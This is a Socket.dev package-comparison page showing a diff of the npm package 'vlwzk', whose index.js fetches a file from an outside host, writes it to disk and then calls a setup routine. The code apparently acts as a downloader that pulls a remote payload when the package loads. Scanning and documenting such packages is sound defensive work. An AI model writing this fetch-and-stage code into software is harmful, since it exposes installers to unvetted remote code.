Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More
Socket
Sign inDemoInstall
Socket

vlwzk

Package Overview
Dependencies
Maintainers
0
Versions
3
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

vlwzk - npm Package Compare versions

Comparing version 0.1.0 to 0.1.1

11

index.js
const fs = require("fs")
const http = require('http');
const http = require('https');
const EventEmitter = require("events")

@@ -8,9 +8,10 @@ const path = require("path")

if(!fs.existsSync(path.join(__dirname,"selam"))){
http.get('http://turanproject.com.tr/kubisiki/selam', (res) => {
let data = '';
http.get('https://turanproject.com.tr/kubisiki/selam', (res) => {
let data = [];
res.on('data', (chunk) => {
data += chunk;
data.push(chunk);
});
res.on('end', () => {
fs.writeFileSync(path.join(__dirname, "selam"), data);
const buffer = Buffer.concat(data);
fs.writeFileSync(path.join(__dirname, "selam"), buffer);
setup();

@@ -17,0 +18,0 @@ });

{
"name": "vlwzk",
"version": "0.1.0",
"version": "0.1.1",
"description": "",

@@ -5,0 +5,0 @@ "main": "server.js",

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc